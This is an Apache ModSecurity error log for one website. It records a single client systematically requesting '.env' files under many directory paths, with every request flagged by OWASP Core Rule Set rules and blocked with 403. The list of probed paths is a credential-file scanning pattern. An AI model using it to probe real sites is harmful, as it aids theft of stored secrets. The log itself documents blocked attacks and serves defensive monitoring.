[Mon May 11 14:10:10.974230 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/tools/.env"] [unique_id "agHHIuJEyNRN152ArORzZwAAAFI"]
[Mon May 11 14:10:10.974500 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/tools/.env"] [unique_id "agHHIuJEyNRN152ArORzZwAAAFI"]
[Mon May 11 14:10:11.244090 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /scripts/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/scripts/.env"] [unique_id "agHHI-JEyNRN152ArORzaAAAAFI"]
[Mon May 11 14:10:11.244463 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/scripts/.env"] [unique_id "agHHI-JEyNRN152ArORzaAAAAFI"]
[Mon May 11 14:10:11.244635 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/scripts/.env"] [unique_id "agHHI-JEyNRN152ArORzaAAAAFI"]
[Mon May 11 14:10:11.244879 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/scripts/.env"] [unique_id "agHHI-JEyNRN152ArORzaAAAAFI"]
[Mon May 11 14:10:11.553816 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/bin/.env"] [unique_id "agHHI-JEyNRN152ArORzaQAAAFI"]
[Mon May 11 14:10:11.554241 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/bin/.env"] [unique_id "agHHI-JEyNRN152ArORzaQAAAFI"]
[Mon May 11 14:10:11.554428 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/bin/.env"] [unique_id "agHHI-JEyNRN152ArORzaQAAAFI"]
[Mon May 11 14:10:11.554675 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/bin/.env"] [unique_id "agHHI-JEyNRN152ArORzaQAAAFI"]
[Mon May 11 14:10:11.873820 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sbin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/sbin/.env"] [unique_id "agHHI-JEyNRN152ArORzagAAAFI"]
[Mon May 11 14:10:11.874300 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/sbin/.env"] [unique_id "agHHI-JEyNRN152ArORzagAAAFI"]
[Mon May 11 14:10:11.874516 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/sbin/.env"] [unique_id "agHHI-JEyNRN152ArORzagAAAFI"]
[Mon May 11 14:10:11.874771 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/sbin/.env"] [unique_id "agHHI-JEyNRN152ArORzagAAAFI"]
[Mon May 11 14:10:12.187876 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/local/.env"] [unique_id "agHHJOJEyNRN152ArORzawAAAFI"]
[Mon May 11 14:10:12.188270 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/local/.env"] [unique_id "agHHJOJEyNRN152ArORzawAAAFI"]
[Mon May 11 14:10:12.188455 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/local/.env"] [unique_id "agHHJOJEyNRN152ArORzawAAAFI"]
[Mon May 11 14:10:12.188703 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/local/.env"] [unique_id "agHHJOJEyNRN152ArORzawAAAFI"]
[Mon May 11 14:10:12.472266 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/portal/.env"] [unique_id "agHHJOJEyNRN152ArORzbQAAAFI"]
[Mon May 11 14:10:12.472649 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/portal/.env"] [unique_id "agHHJOJEyNRN152ArORzbQAAAFI"]
[Mon May 11 14:10:12.472884 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/portal/.env"] [unique_id "agHHJOJEyNRN152ArORzbQAAAFI"]
[Mon May 11 14:10:12.473239 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/portal/.env"] [unique_id "agHHJOJEyNRN152ArORzbQAAAFI"]
[Mon May 11 14:10:12.810496 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dashboard/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/dashboard/.env"] [unique_id "agHHJOJEyNRN152ArORzbgAAAFI"]
[Mon May 11 14:10:12.810907 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/dashboard/.env"] [unique_id "agHHJOJEyNRN152ArORzbgAAAFI"]
[Mon May 11 14:10:12.811132 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/dashboard/.env"] [unique_id "agHHJOJEyNRN152ArORzbgAAAFI"]
[Mon May 11 14:10:12.811453 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/dashboard/.env"] [unique_id "agHHJOJEyNRN152ArORzbgAAAFI"]
[Mon May 11 14:10:12.909592 2026] [core:error] [pid 1319998:tid 1320016] [client 52.242.216.199:59560] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:12.909621 2026] [core:error] [pid 1319998:tid 1320016] [client 52.242.216.199:59560] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:13.129379 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/panel/.env"] [unique_id "agHHJeJEyNRN152ArORzbwAAAFI"]
[Mon May 11 14:10:13.129755 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/panel/.env"] [unique_id "agHHJeJEyNRN152ArORzbwAAAFI"]
[Mon May 11 14:10:13.129946 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/panel/.env"] [unique_id "agHHJeJEyNRN152ArORzbwAAAFI"]
[Mon May 11 14:10:13.130199 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/panel/.env"] [unique_id "agHHJeJEyNRN152ArORzbwAAAFI"]
[Mon May 11 14:10:13.389557 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/crm/.env"] [unique_id "agHHJeJEyNRN152ArORzcQAAAFI"]
[Mon May 11 14:10:13.389954 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/crm/.env"] [unique_id "agHHJeJEyNRN152ArORzcQAAAFI"]
[Mon May 11 14:10:13.390164 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/crm/.env"] [unique_id "agHHJeJEyNRN152ArORzcQAAAFI"]
[Mon May 11 14:10:13.390424 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/crm/.env"] [unique_id "agHHJeJEyNRN152ArORzcQAAAFI"]
[Mon May 11 14:10:13.673607 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /erp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/erp/.env"] [unique_id "agHHJeJEyNRN152ArORzcgAAAFI"]
